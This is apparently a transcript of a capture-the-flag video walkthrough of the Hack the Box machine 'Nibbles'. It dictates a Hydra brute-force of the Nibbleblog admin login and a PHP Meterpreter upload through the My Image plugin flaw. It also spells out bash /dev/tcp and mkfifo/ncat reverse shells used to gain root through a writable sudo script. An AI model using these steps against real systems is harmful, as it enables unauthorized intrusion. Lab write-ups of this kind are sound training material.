Hello everybody and welcome to another edition of Can You Hack It? I'm Ben, also known as Iceman on a lot of the sites like Hack the Box. Today we're going to be walking you through a box that's recently retired called Nibbles from Hack the Box. This is a Linux machine with a relatively easy level of difficulty. Because of the fact that it's relatively easy, I think we'll kind of take a few detours, and that way we can keep the video interesting, help some people learn some new stuff possibly, and we'll still try and get this one done in a relatively short amount of time. So let's go ahead and get started. As you can see here, the IP address of the box is 10.10.10.75. So if we just go ahead and create a Nmap directory, oops, as you can see I've already, oops, I did that in the wrong spot. I've already created a directory called Nibbles, so we'll go into Nibbles, and then we'll create an Nmap directory, and then we'll fire up Nmap and get it running and see what's open on this box. And so we'll do an Nmap-T5, make it aggressive, SC and SV for enumerate versions and run scripts, OA for output all formats, we'll output them to Nmap with quick. And then we'll do a -V so we can see it right now. And then the IP address of our box, which is 10.10.10.75. Oh, I can't type today, as I'm sure you've already noticed. And so it looks like we've got a couple ports open. We've got 80 and 22, so SSH and HTTP. So why don't we go ahead and that finished up. Looks like standard OpenSSL for Ubuntu 2.2, Apache 2.4.18, also Ubuntu. So let's go ahead and we will get Gofuzz up and running, see what else we find on here. So we do Gofuzz. Word list, users share, word lists, dirbuster, directory 2.3 medium, I think, 2.3 medium, do 100 threads, we'll do show response code of 200, show full responses. I think that's all we probably need here, and so we'll do 10.10.10.75 /fuzz. Oh, it's since this is Linux, it's add PHP files because that's probably what they're going to be. Start that digging and manually look here real quick. 10.10.10.75. So we've got hello world. And if we view the page source, we've got a comment down here. It says /nibbleblog directory. Nothing interesting here. If you were to ever see that in real life, the first thing you should always do is look, because it's probably something interesting. So it looks like in this case, it is a blog page. If you haven't heard of nibbleblog before, you're not the first one. I actually hadn't heard of it before doing this challenge. So it looks like we've got nibbleblog here. Well, here, before we take a look at nibbleblog, let's kill this and let's start it fuzzing in that directory. And you can already see we're getting a lot more interesting things. Looks like there's an admin page, which looks like we can sign into it, a readme, an install, and an update. Install looks like it takes you to a link where maybe you want to update. We'll ignore that for now. A readme, and everything else looks fairly standard. So let's do a quick Google search. Nibbleblog exploit. We can actually see there's a couple results here. See if our README file happens to say which version it is. It does. So it's 4.03, 4.0.3. So it looks like we've got a shell upload. When uploading image files via the MyImage plugin, which is delivered with nibbleblog by default, keeps the original extension of the uploaded files. This extension or the actual file typically are not checked, thus it is possible to upload PHP files and gain code execution. So it looks like they've even got some steps here. So we need to get admin credentials, activate the plugin, upload an image, and then visit it. So we've got our login page here. Go ahead, let's kill this. So let's fire up Burp. And what we'll do is we will intercept a login request. Now we could just sit here and guess at it, which honestly is what I did, and because of the way this system was set up, one of my first guesses got me in, but we're not going to go about it that way, at first anyway. I'm going to try something a little bit different just to see if we can show you something a little more useful. What we're basically going to do is create a word list based on this website and then use Hydra to attempt to brute force the login. Now, if that fails, then I'll just show you how we can log in by guessing the password. But before we do that, I want to see if we can actually show you something that's a little more useful. So, with Burp running, let's switch to using it for our proxy. Try and log in with admin and password. And this should be intercepted by Burp, which it was. Go ahead and forward this to repeater, even though we're actually not going to use repeater in this case, but just so we can look at it really easily. And so it looks like it's a post request to admin.php, and it's got these two values in here. Username equals admin, password equals password. So if we copy this, now by the way, you could also do the brute forcing through Burp, but just to show you another tool, we'll do it through Hydra. Another reason for that is if you have the free edition of Burp, it's incredibly limited as far as speed goes. So let's just go ahead and drop this because we don't actually care. Disable that. And so we need to do a couple things now. First off, we need to make a word list based on what is on that site. So what we're going to use for that is cool, is how I pronounce it, CeWL. And we can create a word list. We'll call it please subscribe.txt. Sorry, I'm really not typing well today. .txt. Stealing that from IPSec. If you watch his videos, you'll notice he throws that in there every once in a while just to remind people that if you're enjoying the video, go ahead and subscribe to it. And a minimum length of 4, and then 10.10.10.75/nibbleblog. Let's see if I don't screw up and call it nibbleblog at some point. And so hit enter. That's done. It's pretty quick, especially since this site doesn't have a lot on it, and the default depth is only 2, I think. So if we vim please subscribe, and we'll want to trim this up a bit because there's a lot of stuff it'll pick up, like you see header, main, plugins, categories, stuff like that isn't likely to be the password. So we'll just leave stuff that's not part of kind of common templates. So like hello world was just hello world on there. So if we remove some of this out, home, categorize music videos, header, we may end up with nothing. One of these times I'll try and show this in a video where there's a site with a little more content than this, because I think we're going to end up with almost nothing. I'll leave nibbleblog in there, feed. I'll take out this nibbleblog just because of the fact that it's the same as this one but lowercase, because of the fact that what I normally do after we build that is I build a second copy, or I duplicate the word list to just lowercase versions, because a lot of the time on things where people have been lazy with the passwords, they don't even have mixed case. And especially on these challenges and stuff, it's fairly common to find if it's a password that you're meant to guess. So to get a second copy in there, we'll use the translate command. So tr, I think it's AZ, so translate uppercase to lowercase. And we'll feed in please subscribe, and then we'll feed that out and append it to please subscribe. And so now, we could have obviously done this one by hand because it's so small, but, and so now you see we have the same thing in there, one in its native case and one in lowercase only. And so we have our tempt from here. So now let's fire up Hydra. And so for Hydra, we'll do Hydra. Lowercase L means that we're just giving it a single username, which we'll try admin. You could use uppercase L and feed it a word list with usernames to try. Uppercase P, because we're feeding it a list of passwords rather than just a single one to try. Please subscribe. And we'll just do a single thread, and we'll give it up to 30 seconds per request. And then do an HTTP form post, and we'll do it to nibbleblog admin.php. And then the way the arguments are separated in here is that's the URL that we're going to post to, a semicolon, and we'll have our post parameters, username and password. And so we're going to replace these with special markers that tell it where to replace. We could have actually just left admin in there probably. I don't know if it cares if user's missing since we're only trying one, but anyway. And then a what to look for in the case of an incorrect login, which we'll just go ahead and attempt here. Admin password. So it says incorrect username or password. We'll just use the word incorrect then. And I believe that's all we need, so let's fire it up, see what happens. And it looks like it found it. The password is Nibbles. And so let us see if we can get in here. Admin and Nibbles. And there we go. So we're logged in as admin now. So if you remember, it said that we need to enable the My Image plugin, which we might be able to do from here. My Image. Oh, it looks like it's already installed. I wonder if somebody's been on this box recently. Hopefully nobody's on it now, because we might mess them up, but that's okay. I don't think that the exploits on here should matter too much, other than we may end up overriding theirs. But let's take a look actually really quick. Well, let's just try and upload something. So we hit configure on my image. We'll select position 1, leave the title at my image. Caption can be whatever. Like the video. Yeah, that's shameless. And so we need to actually make, before we do this, we need to make a payload that we're going to send. And so for that, let's use msfvenom, I suppose. There's a lot of different ways we could do this. We could upload a PHP web shell. What I'll do here, I think, I'll just kind of play this by the seat of my pants, but we'll create a meterpreter session for the initial shell, and then I'll see if we can spin off to something else like netcat or a bash reverse shell or something for when we do our privilege escalation. That way we're kind of mixing up techniques. So msfvenom, P for payload, PHP meterpreter, reverse TCP. And so just like always, we'll have our lhost parameter 10, 14, 15 in my case, lport 4444. The encoding will set to PHP base 64. So we're going to base 64 encode this payload. The format is raw, and we'll output that to meterpreter.php. And I think we're going to need to edit that. Because if I remember right, yeah, so this uses an eval statement with a base64 decode, which is fine. But if you'll notice, it doesn't have anything wrapped around it to execute PHP. So we need to create a PHP page for it to live within. So we'll just do a quick PHP, and we'll add one at the end here. That should be sufficient. And so now, if we pull that web page back up, browse, wrong spot, meterpreter.php. And so we should be able to just hit save changes. You can ignore these errors. They mention that in some of the CVE details also. They say that errors come up, errors don't matter. So now if we go to the page for the plugin, which I believe is, let's see if I can get this right the first time, content private plugins. I wasn't even noticing that that was coming up. My image slash, and it's not going to be our extension, it's actually going to be just image.php. So that's one thing that kind of caught me off guard at first with some of this stuff, was that I was expecting it to give me my original extension. Before we hit enter there, we need to actually have a handler running, because otherwise nobody's listening for this reverse connection. So if we do a use or exploit multi-handler, and we set our payload to the same payload, so PHP meterpreter reverse TCP, and then set lhost to 10, 10, 14, 15, set lport to 4444, set exit on session to false, and then do an exploit-j to run it in the background. So now we're ready for that reverse shell. Let's see if we can actually get it. So it's hanging on connecting, which is a good sign. That usually means that we got it. So we did. And so now if we do sessions L, we see we have a session there, session -I to interact with it, 1. And so now we should be on the box. If we do an ls here, see where we're at. So it looks like we're inside of var www http nibbleblog content private plugins my image. Okay, so now that we've got a shell, we could, oops, sorry. We can, well, let's get this a little bit better. Which Python, nope, which Python 3, okay, Python 3 -c import pty.spawn bin bash. There we go. A little bit more like a full TTY. So if we do a cd home nibbler, yeah, you can see there, sorry, I'm pointing at the screen again. You can see here we're nibbler, so if we change to nibbler's directory, do an ls, we've got user.text there, lsla. You can see user.text is 33, so that's the 32 character MD5 plus the new line. And we will, let's see, I'll show you just the beginning part of it so you can see that we've found it and we can access it. Echo user.text to cut-c1 through 16. Oh, oops, not echo. Cat user.text cut-c1 through 16. There you can see the first 16 characters of the user password. So we've gotten through that fairly quickly. And so now we need to see if we can get privilege escalation. So what we'll do, we can do a couple things here. Let's background this. And then let's upload root, Dropbox tools, scripts, LinEnum, and we'll put that in TMP then I suppose we'll just leave it .sh. And so now if we channel 0, channel, is it I for interact? Yeah, 0. Now we're back interacting in our channel 0. In temp, we've got our LinEnum script. We probably have to chmod it. Now we can execute it. While that's running, I'm going to background it again. Open a second shell. And we'll do 3c pty.spawn dash. We'll get really sick of typing that. And we'll do a sudo -l, see what we can run without any passwords, hopefully, if we have any sudo permissions. It's taken forever, so my guess is that the host name on this box is probably incorrect, and so it's trying to do a DNS lookup that's taking time and then eventually failing. And as you can see here, it looks like we can run the following command without, as root, without a password. So home nibbler personal stuff monitor.sh. So if we do a nibbler, doesn't look like there is a directory called that. There's a personal.zip file, which I suppose we could unzip. Unzip personal.zip. So that looks like it extracted the folder structure we were looking for in the monitor script. Cat personal stuff monitor.sh. Big ugly script. We actually don't care in this case, I don't think. Let's go back to our other let's look at the output of our enumeration script real quick, but I think what we'll do is we'll create our own monitor.sh, because if we can write it, we can make it into something a little more fun. I noticed several people asked me questions on the forum on this box, which, by the way, you're encouraged to do. It's fine, as long as you're not looking for an answer, or a specific answer. I'll point you in the right direction for resources to figure things out for yourself. But anyway, they spent hours trying to figure out how to use that script to get a privilege escalation. And the thing is, you don't need to use that script. If it's something like being able to sudo it, as long as you can override it, make it what you want. If it's something where it's set UID, then maybe you have to figure out how to do it, or if you don't have write access or whatever. But in this case we do, and so don't waste your time with that. I assume that that was the original author's intent too. I've never actually looked very closely at monitor.sh, but I digress. Let's take a look through these results real quick to just see if there's anything super obvious. I don't see anything that stands out right away. It does look like we're the only people on the box right now, which is good. Just good meaning that I didn't trample on anybody else's session, presumably. Which brings me to another point. Remember to reset the boxes after you're done with them if you can tell nobody's on there. So do a who, look at network connections. If it looks like nobody's banging around on it, be kind and reset it, because a lot of the time I've gotten on boxes where people have left an enormous amount of stuff behind. A lot of things, they spoil the whole challenge for everybody. So just keep that in mind. Let's go ahead and background this again. It looks like we have netcat on here, which is good. Netcat and NC. So two different versions of netcat probably. So netcat. That looks like the newer version. And then NC. That's actually, it looks like the same version. So there's some versions with a -e where we can use them to create a reverse shell really easily. This one doesn't happen to have it with either. Let's background it again. Let's do channel I1. Channel. Did I lose my first channel? Oh, it's not 1 for some reason, it's 2, okay. Channel -I2. So now we're back in this. So we've got our monitor sh script that we're going to go after. And so to do that, we're going to need to create a reverse shell. So let's start up a listener over on this side, and cat lvnp 1337. So we'll listen on port 1337. And back on Nibbler, let's create a reverse shell. So if we see personal stuff in monitor.sh, sorry, we don't have tab completion. Ooh, and then's all screwed up because our TTY or our terminal's wrong. Which I could try to fix, but it's probably not worth the effort. So let's try doing this. --i. Let's see. Let's try using a simple bash. Bash reverse shell. Test monkey. Okay, yeah, it is what I thought. So if we do bash-i, then dev TCP, and then our IP address, and then the port number 1337. And so what we're doing here is we're redirecting standard input and output, tying it to this, I'm using air quotes here, file in the dev file system, which is actually a TCP connection to our IP address, and then that port. Make sure this actually works. Looks like it does. Restart our listener. And so let's take this and echo it into monitor.sh. And so now if we cat monitor.sh, we've overwritten the original contents. Now we just have that reverse shell. And so if we do sudo, I think we have to do the fully qualified path since that's the way it's set up in there. So home nibbler personal stuff monitor.sh. Wait for the timeout to happen again. Which, by the way, if I remember when this time's out, we'll take a quick peek at Etsy hosts and see if my hypothesis is correct. Bad FD number. Interesting. So the file descriptor it's claiming is bad. There's another way we can do this. Let's here. Hosts. Yeah. So this should be set to Nibbles. And it's not. It's set to Shocker. And so that's why we're getting the long timeouts on running sudo. Let's try doing a different type of bash shell. I should have tried this first, I suppose. A different type of bash shell. And if that doesn't work, then we could just do something like, well, here, let's do that first, I suppose. So if we echo cat root.text to cut 16. So what this should do is cat the root.txt file and show us the first 16 characters of it. That way I'm not giving away the whole thing to you guys. So let's see, home nibbler personal stuff monitor.sh. Wait for the timeout again. And there you go. So there's the first 16 characters of that. But just because everybody likes to get shells, let's see if we can get that shell, because I think we can. When I originally did the box, I just did the cat, get the root, get the flag, and call it good, because as much as it's fun getting shells, I was more interested in just pushing through these, and so I went about it whichever way was the easiest. So we'll do the trick with FIFOs. So if we do rm temp, we can call it anything we want. Temp f, I think is what they normally call it in a lot of the scripts. Terminate that, mk FIFO, and so that's basically just removing it if it already exists. We'll make a FIFO called temp f. We'll cat temp f, pipe that to bin bash dash I, tie standard standard out in air. And then use that ncat that we saw, 10, 10, 14, 15, 1337. Pipe that to our FIFO, temp F. So I think that should work for .sh. Let's give it a quick test on .sh again to make sure it works. It's interesting that it works. That the last one worked also without the sudo, but didn't work with it. So again, we're on, and of course we're nibbler still. So let's exit, start our listener again, and let's sudo it. Sudo home nibbler personal stuff monitor.sh. And we'll wait for the timeout, cross our fingers, and see what happens. And that one looks like it did work. So as you can see here, I did it again, pointed at the screen. See here on the left, we're root now. Who am I? Or ID. See that we're root. So if we do cd root lsla, got our root.txt file there, 33 characters long. And as you saw already, we can echo root.txt to cut and just show the first 16 characters. Oops. Twice in this video I've done that. And so there you go. So that's it. I hope you enjoyed the video. Feel free to contact me if you have questions on boxes, reaching out on the forums or whatever. I'll try and point you in the right direction. Please ask intelligent questions, meaning that you've tried something, you've got something that you're trying to get help with, not just I'm trying to do box X, can you give me the answer? Because I won't. Feel free to follow me on Twitter, like the video, subscribe, and I will see you on the next one. Everybody have a great weekend, or whenever you're watching this.